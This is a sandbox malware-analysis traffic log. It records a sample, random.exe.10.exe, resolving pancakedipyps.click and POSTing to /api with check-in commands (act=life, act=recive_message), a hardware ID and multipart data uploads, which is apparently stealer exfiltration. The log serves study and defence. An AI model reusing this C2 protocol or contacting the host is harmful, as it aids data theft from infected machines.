                                                                                                                              Dec 18, 2024 13:50:09.274971008 CET44349723104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:09.275190115 CET49723443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:09.280826092 CET49723443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:09.280857086 CET44349723104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:09.281178951 CET44349723104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:09.292860031 CET49723443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:09.292884111 CET49723443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:09.292944908 CET44349723104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:11.969053984 CET44349723104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:11.969150066 CET44349723104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:11.969242096 CET49723443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:11.969518900 CET49723443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:11.969537973 CET44349723104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:11.969548941 CET49723443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:11.969553947 CET44349723104.21.23.76192.168.2.9
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 18, 2024 13:49:45.866281033 CET5700553192.168.2.91.1.1.1
                                                                                                                              Dec 18, 2024 13:49:46.208689928 CET53570051.1.1.1192.168.2.9
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Dec 18, 2024 13:49:45.866281033 CET192.168.2.91.1.1.10x59bStandard query (0)pancakedipyps.clickA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Dec 18, 2024 13:49:46.208689928 CET1.1.1.1192.168.2.90x59bNo error (0)pancakedipyps.click104.21.23.76A (IP address)IN (0x0001)false
                                                                                                                              Dec 18, 2024 13:49:46.208689928 CET1.1.1.1192.168.2.90x59bNo error (0)pancakedipyps.click172.67.209.202A (IP address)IN (0x0001)false
                                                                                                                              • pancakedipyps.click
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.949712104.21.23.764437908C:\Users\user\Desktop\random.exe.10.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-18 12:49:47 UTC266OUTPOST /api HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                              Content-Length: 8
                                                                                                                              Host: pancakedipyps.click
                                                                                                                              2024-12-18 12:49:47 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                              Data Ascii: act=life
                                                                                                                              2024-12-18 12:49:48 UTC1036INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 18 Dec 2024 12:49:48 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: PHPSESSID=u4cto7oj9h8j5tlkd1jhodsn49; expires=Sun, 13-Apr-2025 06:36:26 GMT; Max-Age=9999999; path=/
                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              vary: accept-encoding
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ZFWHZ8cB%2FvFxtxBCgiEp2V1V%2BRj8WTjA7YQTht8xrvtbKdrCDmvNTcyXGMFX6ZWtkG3JIkxEHZ8gLjZLp6cYPuoCuGwYdcO7yLE%2FoO2DrKGpJULMsTsbY8U28HSLvK0cULfOX92"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f3f4661c94c41f5-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2130&min_rtt=2128&rtt_var=802&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1360671&cwnd=211&unsent_bytes=0&cid=a932f0bbf3f5e91d&ts=975&x=0"
                                                                                                                              2024-12-18 12:49:48 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                              Data Ascii: 2ok
                                                                                                                              2024-12-18 12:49:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.949713104.21.23.764437908C:\Users\user\Desktop\random.exe.10.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-18 12:49:49 UTC267OUTPOST /api HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                              Content-Length: 46
                                                                                                                              Host: pancakedipyps.click
                                                                                                                              2024-12-18 12:49:49 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                              2024-12-18 12:49:50 UTC1034INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 18 Dec 2024 12:49:50 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: PHPSESSID=oua7p1c8onp19bqmm3vg095ag1; expires=Sun, 13-Apr-2025 06:36:29 GMT; Max-Age=9999999; path=/
                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              vary: accept-encoding
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F7vY80Nyyz6TdisANJKCKIJR3LcFXm7AKVS4NvvLwRP6DnagljknjRcACZHvsPduC%2BgB5F1pR6fQ5JyJgcLNgAWwQ6XaU8Kq37ewE4cEfZyja8fSgBgB4rwRxpBsUJU%2Fq5BfpZLL"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f3f466f1e251780-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1503&rtt_var=580&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=949&delivery_rate=1862244&cwnd=171&unsent_bytes=0&cid=e48dcf4fa0bab546&ts=968&x=0"
                                                                                                                              2024-12-18 12:49:50 UTC335INData Raw: 34 64 63 0d 0a 67 75 31 66 55 56 79 68 37 59 6c 2b 36 67 37 6e 78 4d 66 58 4d 64 61 35 68 64 31 31 39 4d 55 68 4e 59 35 57 39 64 4f 50 73 2b 76 35 7a 79 6c 7a 5a 70 58 42 71 77 32 50 4c 4e 32 77 74 61 4a 55 2b 70 76 6b 75 56 66 4f 6f 30 42 5a 2f 54 50 5a 38 66 6e 65 79 62 69 4c 50 6a 30 76 78 4d 47 72 47 35 49 73 33 5a 2b 38 39 56 53 34 6d 37 2f 2f 45 4a 36 6e 51 46 6e 73 4e 35 36 38 2f 39 2b 49 36 6f 45 34 4f 54 6e 43 69 65 67 53 68 32 75 43 6f 61 61 39 58 37 2f 55 37 62 42 58 32 4f 64 45 54 36 78 73 31 35 37 71 78 34 72 50 6a 43 77 36 66 74 7a 42 38 6c 79 50 59 4d 58 2b 35 62 5a 55 74 4e 58 6a 75 52 36 63 72 55 6c 52 37 54 4b 66 6f 2b 62 56 67 2b 71 50 4f 7a 67 7a 79 35 33 6c 47 49 42 67 68 4b 75 6d 39 52 33 30 33 50 2f 2f 54 39 62 30 63 56 54 39 4a 59
                                                                                                                              Data Ascii: 4dcgu1fUVyh7Yl+6g7nxMfXMda5hd119MUhNY5W9dOPs+v5zylzZpXBqw2PLN2wtaJU+pvkuVfOo0BZ/TPZ8fneybiLPj0vxMGrG5Is3Z+89VS4m7//EJ6nQFnsN568/9+I6oE4OTnCiegSh2uCoaa9X7/U7bBX2OdET6xs157qx4rPjCw6ftzB8lyPYMX+5bZUtNXjuR6crUlR7TKfo+bVg+qPOzgzy53lGIBghKum9R303P//T9b0cVT9JY
                                                                                                                              2024-12-18 12:49:50 UTC916INData Raw: 49 58 38 33 71 4f 38 65 72 64 79 62 6a 50 4f 7a 30 2f 7a 6f 2f 35 46 49 4e 6e 67 4c 53 75 76 46 36 35 32 2b 71 31 47 4a 57 6e 52 46 33 6d 4f 35 32 31 34 4e 79 50 34 49 39 39 66 58 37 45 6c 36 74 45 79 45 2b 41 74 71 4b 35 52 66 62 68 70 36 42 5a 6a 2b 64 45 57 36 78 73 31 37 6e 6f 30 6f 72 72 67 44 34 37 4e 64 47 50 2b 52 71 46 61 5a 65 67 6f 4c 74 5a 74 38 6e 74 73 52 47 56 72 6b 68 65 36 54 4f 54 38 61 4f 52 6a 76 6a 50 5a 58 4d 66 7a 6f 54 6e 46 70 39 73 78 62 6e 72 72 42 4f 7a 31 36 66 6e 56 35 4b 6d 52 31 62 6f 4f 70 6d 31 34 64 65 48 37 59 41 37 4f 54 37 45 68 65 4d 55 69 57 47 4f 71 61 57 77 58 72 44 64 36 37 34 53 31 75 6b 44 55 50 52 30 7a 2f 48 44 31 6f 72 79 7a 51 67 77 4d 4d 32 49 2f 56 79 58 49 70 7a 6d 6f 72 6b 54 37 4a 76 70 75 68 69 45 70
                                                                                                                              Data Ascii: IX83qO8erdybjPOz0/zo/5FINngLSuvF652+q1GJWnRF3mO5214NyP4I99fX7El6tEyE+AtqK5Rfbhp6BZj+dEW6xs17no0orrgD47NdGP+RqFaZegoLtZt8ntsRGVrkhe6TOT8aORjvjPZXMfzoTnFp9sxbnrrBOz16fnV5KmR1boOpm14deH7YA7OT7EheMUiWGOqaWwXrDd674S1ukDUPR0z/HD1oryzQgwMM2I/VyXIpzmorkT7JvpuhiEp
                                                                                                                              2024-12-18 12:49:50 UTC1369INData Raw: 34 34 34 30 0d 0a 79 59 48 6b 46 6f 42 6b 68 61 75 6b 76 6c 75 79 31 75 79 77 47 4a 47 76 51 46 76 70 4f 5a 54 78 6f 35 47 4f 2b 4d 39 6c 63 78 76 4e 6a 50 6f 4e 79 6c 6d 47 71 4b 75 79 52 66 54 45 71 61 5a 58 6b 61 73 44 44 36 77 2b 6b 4c 62 70 33 49 50 6a 69 7a 6b 2b 4d 63 71 47 34 67 36 43 59 49 75 30 71 4c 39 57 75 74 66 69 73 42 65 58 70 6b 31 64 35 33 54 5a 38 65 72 4a 79 62 6a 50 45 6a 34 75 30 59 58 67 44 63 70 5a 68 71 69 72 73 6b 58 30 78 4b 6d 6d 56 35 47 72 41 77 2b 73 50 35 47 39 34 64 47 50 38 6f 45 79 49 54 54 52 69 2b 55 59 68 47 4b 4d 71 36 71 77 51 62 44 62 39 62 34 53 6b 61 6c 4f 52 65 6c 30 32 66 48 71 79 63 6d 34 7a 77 63 48 4f 64 4f 65 37 46 36 39 62 34 75 6f 6f 71 4d 54 71 35 58 2b 2f 78 43 61 35 78 73 58 37 7a 69 61 75 4f 6a 65 6d
                                                                                                                              Data Ascii: 4440yYHkFoBkhaukvluy1uywGJGvQFvpOZTxo5GO+M9lcxvNjPoNylmGqKuyRfTEqaZXkasDD6w+kLbp3IPjizk+McqG4g6CYIu0qL9WutfisBeXpk1d53TZ8erJybjPEj4u0YXgDcpZhqirskX0xKmmV5GrAw+sP5G94dGP8oEyITTRi+UYhGKMq6qwQbDb9b4SkalORel02fHqycm4zwcHOdOe7F69b4uooqMTq5X+/xCa5xsX7ziauOjem
                                                                                                                              2024-12-18 12:49:50 UTC1369INData Raw: 7a 4e 4e 47 4b 35 52 69 43 61 59 47 71 72 37 56 57 70 74 50 68 75 42 75 65 6f 6b 78 52 36 54 6d 51 75 75 37 44 6d 2b 4f 4c 4d 7a 39 2b 6a 63 2f 73 42 4d 67 30 78 59 4f 79 74 6b 4f 79 32 4b 65 67 57 59 2f 6e 52 46 75 73 62 4e 65 78 34 39 32 43 35 34 51 32 4e 7a 72 44 67 75 41 53 68 6d 57 4a 72 71 6d 79 51 62 6e 65 37 37 55 65 6b 36 74 4f 56 50 34 33 6c 76 47 6a 6b 59 37 34 7a 32 56 7a 47 66 43 34 79 46 79 58 49 70 7a 6d 6f 72 6b 54 37 4a 76 6d 74 78 43 59 6f 31 46 5a 2f 6a 71 51 73 65 76 5a 67 65 65 44 4d 7a 30 73 79 34 37 72 45 6f 64 6b 6a 4b 4b 6b 73 56 65 34 33 4b 66 78 56 35 47 2f 41 77 2b 73 48 4a 53 72 39 35 4f 6e 36 34 38 36 49 79 6a 59 7a 2f 52 53 6b 53 79 43 71 75 58 74 45 37 44 51 37 62 59 55 6e 36 4e 4f 56 2b 55 37 6e 72 6e 67 32 5a 76 68 68 53
                                                                                                                              Data Ascii: zNNGK5RiCaYGqr7VWptPhuBueokxR6TmQuu7Dm+OLMz9+jc/sBMg0xYOytkOy2KegWY/nRFusbNex492C54Q2NzrDguAShmWJrqmyQbne77Uek6tOVP43lvGjkY74z2VzGfC4yFyXIpzmorkT7JvmtxCYo1FZ/jqQsevZgeeDMz0sy47rEodkjKKksVe43KfxV5G/Aw+sHJSr95On6486IyjYz/RSkSyCquXtE7DQ7bYUn6NOV+U7nrng2ZvhhS
                                                                                                                              2024-12-18 12:49:50 UTC1369INData Raw: 67 2b 45 54 69 32 53 49 70 61 32 6e 55 37 6e 62 39 61 30 52 6e 61 6b 44 47 61 77 7a 6a 2f 47 31 6b 62 6a 33 68 48 30 73 63 4e 72 50 37 42 44 49 4e 4d 57 6c 72 37 68 64 70 74 2f 68 74 42 53 59 72 30 5a 66 36 44 36 61 76 75 62 62 67 4f 69 50 4d 6a 59 32 79 49 6e 6c 48 59 35 67 69 4f 62 72 39 56 53 73 6d 37 2f 2f 4d 49 79 71 52 55 44 39 41 5a 43 78 76 4a 47 57 72 70 5a 39 4e 44 4b 44 31 36 73 52 68 47 61 49 6f 36 47 39 56 4c 66 61 36 37 73 61 6d 36 4e 4b 55 2b 6b 6d 68 62 66 6a 30 59 62 75 67 44 45 68 4d 4d 61 50 35 31 7a 47 4c 49 4b 2b 35 65 30 54 68 63 7a 6e 2f 77 6a 59 76 67 4e 51 34 48 54 50 38 65 4c 63 6d 2b 79 41 50 54 49 39 78 34 54 73 47 6f 35 74 68 71 4f 6d 73 46 57 31 32 2b 75 31 45 4a 36 74 54 56 72 71 4d 4a 47 33 72 5a 2f 4a 35 35 64 39 61 33 37
                                                                                                                              Data Ascii: g+ETi2SIpa2nU7nb9a0RnakDGawzj/G1kbj3hH0scNrP7BDINMWlr7hdpt/htBSYr0Zf6D6avubbgOiPMjY2yInlHY5giObr9VSsm7//MIyqRUD9AZCxvJGWrpZ9NDKD16sRhGaIo6G9VLfa67sam6NKU+kmhbfj0YbugDEhMMaP51zGLIK+5e0Thczn/wjYvgNQ4HTP8eLcm+yAPTI9x4TsGo5thqOmsFW12+u1EJ6tTVrqMJG3rZ/J55d9a37
                                                                                                                              2024-12-18 12:49:50 UTC1369INData Raw: 49 39 73 69 61 6d 69 76 56 79 77 32 2b 6a 2f 57 64 61 67 57 78 65 30 64 4c 65 36 2b 2f 43 48 36 35 31 39 4c 48 44 61 7a 2b 77 51 79 44 54 46 71 4b 79 30 57 37 72 58 37 37 73 46 6c 71 78 4b 57 4f 30 37 6c 37 4c 73 32 34 48 79 69 54 30 34 4e 73 53 48 37 78 4b 61 62 59 72 6d 36 2f 56 55 72 4a 75 2f 2f 79 61 41 6f 45 52 59 72 68 32 51 71 75 7a 62 69 75 75 44 66 53 78 77 32 73 2f 73 45 4d 67 30 78 61 75 70 75 46 65 6d 31 2b 65 2f 48 70 47 74 55 56 6a 6a 4f 5a 53 78 36 4d 4f 49 38 6f 41 32 4e 6a 33 48 67 4f 51 51 67 47 62 46 36 4f 57 79 53 2f 53 44 70 35 4d 55 68 36 30 42 63 50 59 69 6b 4c 33 38 32 6f 54 73 7a 79 4a 39 4a 34 4f 49 35 31 7a 51 4c 49 57 6e 71 4b 64 57 74 64 48 74 73 68 2b 5a 6f 6b 5a 59 36 44 43 63 76 2f 2f 66 68 75 43 4a 4e 6a 49 37 77 49 54 68
                                                                                                                              Data Ascii: I9siamivVyw2+j/WdagWxe0dLe6+/CH6519LHDaz+wQyDTFqKy0W7rX77sFlqxKWO07l7Ls24HyiT04NsSH7xKabYrm6/VUrJu//yaAoERYrh2QquzbiuuDfSxw2s/sEMg0xaupuFem1+e/HpGtUVjjOZSx6MOI8oA2Nj3HgOQQgGbF6OWyS/SDp5MUh60BcPYikL382oTszyJ9J4OI51zQLIWnqKdWtdHtsh+ZokZY6DCcv//fhuCJNjI7wITh
                                                                                                                              2024-12-18 12:49:50 UTC1369INData Raw: 36 69 72 4c 42 62 74 39 37 69 74 52 75 61 70 6b 74 65 35 6a 47 53 74 2b 66 53 68 2b 2b 4f 4d 54 63 33 7a 59 61 72 55 73 68 72 6e 65 62 39 39 57 57 6b 33 50 2b 79 42 39 53 56 51 45 62 39 49 5a 71 68 36 35 4f 6d 34 34 4d 2b 4e 6a 6e 54 7a 2f 52 53 6b 53 79 43 71 75 58 74 45 37 54 66 36 37 77 51 6d 4b 68 4f 57 4f 73 2f 6d 4c 76 6a 77 34 62 6c 68 7a 45 37 4d 39 47 46 34 51 36 42 5a 59 69 6f 72 61 64 51 39 4a 57 6e 75 41 2f 57 2f 77 4e 6c 35 6a 65 62 70 2b 44 65 79 66 2f 42 4a 48 4d 35 7a 38 2b 7a 58 4a 70 2b 68 61 32 6c 73 6c 32 6d 32 75 2b 77 48 5a 61 68 53 46 33 76 50 5a 4f 2f 35 4e 65 49 37 59 34 38 4d 7a 76 44 68 76 6b 52 79 43 4c 46 6f 62 33 31 43 2f 54 73 36 37 51 6d 6c 62 45 44 53 4b 49 74 31 37 62 68 6b 64 47 67 6a 69 38 2b 4e 73 65 50 35 68 71 44 62
                                                                                                                              Data Ascii: 6irLBbt97itRuapkte5jGSt+fSh++OMTc3zYarUshrneb99WWk3P+yB9SVQEb9IZqh65Om44M+NjnTz/RSkSyCquXtE7Tf67wQmKhOWOs/mLvjw4blhzE7M9GF4Q6BZYioradQ9JWnuA/W/wNl5jebp+Deyf/BJHM5z8+zXJp+ha2lsl2m2u+wHZahSF3vPZO/5NeI7Y48MzvDhvkRyCLFob31C/Ts67QmlbEDSKIt17bhkdGgji8+NseP5hqDb
                                                                                                                              2024-12-18 12:49:50 UTC1369INData Raw: 37 45 36 61 62 76 2f 39 51 6c 62 56 52 55 65 38 69 6c 50 62 54 37 36 6e 72 6d 54 77 2b 4e 63 2b 78 31 51 6d 4c 59 6f 75 68 73 36 51 54 2b 70 76 6f 2f 30 2b 76 35 77 73 58 30 33 72 58 71 61 32 4a 79 64 57 4d 4d 7a 30 35 31 5a 36 6d 50 49 4e 36 68 4b 75 75 75 52 47 31 31 76 65 34 56 39 6a 6e 52 52 65 30 5a 4e 6e 78 36 63 44 4a 75 4e 39 76 61 47 75 51 32 4c 74 4f 6c 79 4b 63 35 72 50 31 43 2b 61 56 70 36 31 58 7a 75 63 45 56 50 34 6d 6b 62 4c 37 30 73 37 65 73 52 30 34 4d 73 43 44 36 68 76 49 49 73 57 70 35 65 31 71 39 4e 6a 31 72 56 69 48 73 55 35 48 36 33 69 66 6f 4f 44 64 79 61 37 50 63 54 63 31 7a 34 72 73 44 4d 64 2b 6c 61 32 70 6f 78 2b 77 79 61 66 78 56 34 65 73 54 45 58 69 4d 39 69 67 2b 39 79 5a 34 34 6f 36 66 7a 62 53 67 75 64 63 78 69 79 51 72 61
                                                                                                                              Data Ascii: 7E6abv/9QlbVRUe8ilPbT76nrmTw+Nc+x1QmLYouhs6QT+pvo/0+v5wsX03rXqa2JydWMMz051Z6mPIN6hKuuuRG11ve4V9jnRRe0ZNnx6cDJuN9vaGuQ2LtOlyKc5rP1C+aVp61XzucEVP4mkbL70s7esR04MsCD6hvIIsWp5e1q9Nj1rViHsU5H63ifoODdya7PcTc1z4rsDMd+la2pox+wyafxV4esTEXiM9ig+9yZ44o6fzbSgudcxiyQra
                                                                                                                              2024-12-18 12:49:50 UTC1369INData Raw: 30 65 44 7a 58 39 71 32 55 46 6e 6e 49 70 44 78 30 70 2f 4a 2b 4d 39 6c 63 77 76 41 67 65 55 62 6e 6e 33 49 67 4b 61 79 56 62 66 56 38 4b 35 58 32 4f 64 46 46 37 52 6d 32 66 48 70 77 4d 6d 34 33 32 39 6f 61 35 44 59 75 30 36 58 49 70 7a 6d 73 2f 55 4c 35 35 57 6e 72 56 66 4f 35 77 52 5a 34 54 57 55 76 2b 37 44 6d 2b 61 4d 4b 7a 42 35 2f 62 48 4f 45 59 56 70 69 36 47 62 69 33 4b 2b 79 2b 71 77 45 4b 69 5a 64 45 62 72 4a 4e 57 58 37 73 65 4b 6f 4d 46 39 4b 33 36 62 7a 38 6f 57 6d 47 47 4b 6f 65 58 37 45 37 43 62 76 2f 38 79 6d 36 70 47 57 65 74 32 74 72 76 39 33 49 62 6e 7a 33 4e 7a 4d 6f 50 58 71 78 32 43 66 49 69 70 6f 76 6c 55 72 74 79 6e 38 56 65 59 35 78 73 58 37 54 36 48 76 4f 4c 57 78 65 61 42 4d 33 4d 68 6a 5a 61 72 43 73 67 30 31 75 6a 6c 70 78 50
                                                                                                                              Data Ascii: 0eDzX9q2UFnnIpDx0p/J+M9lcwvAgeUbnn3IgKayVbfV8K5X2OdFF7Rm2fHpwMm4329oa5DYu06XIpzms/UL55WnrVfO5wRZ4TWUv+7Dm+aMKzB5/bHOEYVpi6Gbi3K+y+qwEKiZdEbrJNWX7seKoMF9K36bz8oWmGGKoeX7E7Cbv/8ym6pGWet2trv93Ibnz3NzMoPXqx2CfIipovlUrtyn8VeY5xsX7T6HvOLWxeaBM3MhjZarCsg01ujlpxP


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.949714104.21.23.764437908C:\Users\user\Desktop\random.exe.10.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-18 12:49:52 UTC275OUTPOST /api HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: multipart/form-data; boundary=EKLZN1L1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                              Content-Length: 12784
                                                                                                                              Host: pancakedipyps.click
                                                                                                                              2024-12-18 12:49:52 UTC12784OUTData Raw: 2d 2d 45 4b 4c 5a 4e 31 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 4b 4c 5a 4e 31 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 4b 4c 5a 4e 31 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 45 4b 4c 5a 4e 31 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                              Data Ascii: --EKLZN1L1Content-Disposition: form-data; name="hwid"071A6BC798D46C7BAC8923850305D13E--EKLZN1L1Content-Disposition: form-data; name="pid"2--EKLZN1L1Content-Disposition: form-data; name="lid"FATE99--test--EKLZN1L1Content-Dispositi
                                                                                                                              2024-12-18 12:49:53 UTC1044INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 18 Dec 2024 12:49:53 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: PHPSESSID=bq94d7lv3ja97gsjlg5u4p9ltq; expires=Sun, 13-Apr-2025 06:36:32 GMT; Max-Age=9999999; path=/
                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              vary: accept-encoding
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bF9er4PRu%2Bp8KGvF%2BWxYcJe7uPOKGj0zZYqq5SqOR7yDvStUkEDYMzUaIi0XeyyWcOYEedMdOmRg%2Blf8l2DwsaZbyYQeHg6u1xt%2F0hamW6V0zt3sVxRlJM%2BHJtRh2fe8oGRKKwrw"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f3f46821d3c8c57-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2072&min_rtt=2064&rtt_var=790&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2849&recv_bytes=13717&delivery_rate=1372180&cwnd=216&unsent_bytes=0&cid=4edfe3415751bb95&ts=1076&x=0"
                                                                                                                              2024-12-18 12:49:53 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                              2024-12-18 12:49:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.949715104.21.23.764437908C:\Users\user\Desktop\random.exe.10.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-18 12:49:55 UTC284OUTPOST /api HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: multipart/form-data; boundary=RLMLEXFN40IEXJDRL
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                              Content-Length: 15056
                                                                                                                              Host: pancakedipyps.click
                                                                                                                              2024-12-18 12:49:55 UTC15056OUTData Raw: 2d 2d 52 4c 4d 4c 45 58 46 4e 34 30 49 45 58 4a 44 52 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 4c 4d 4c 45 58 46 4e 34 30 49 45 58 4a 44 52 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 4c 4d 4c 45 58 46 4e 34 30 49 45 58 4a 44 52 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d
                                                                                                                              Data Ascii: --RLMLEXFN40IEXJDRLContent-Disposition: form-data; name="hwid"071A6BC798D46C7BAC8923850305D13E--RLMLEXFN40IEXJDRLContent-Disposition: form-data; name="pid"2--RLMLEXFN40IEXJDRLContent-Disposition: form-data; name="lid"FATE99--test--
                                                                                                                              2024-12-18 12:49:56 UTC1043INHTTP/1.1 200 OK
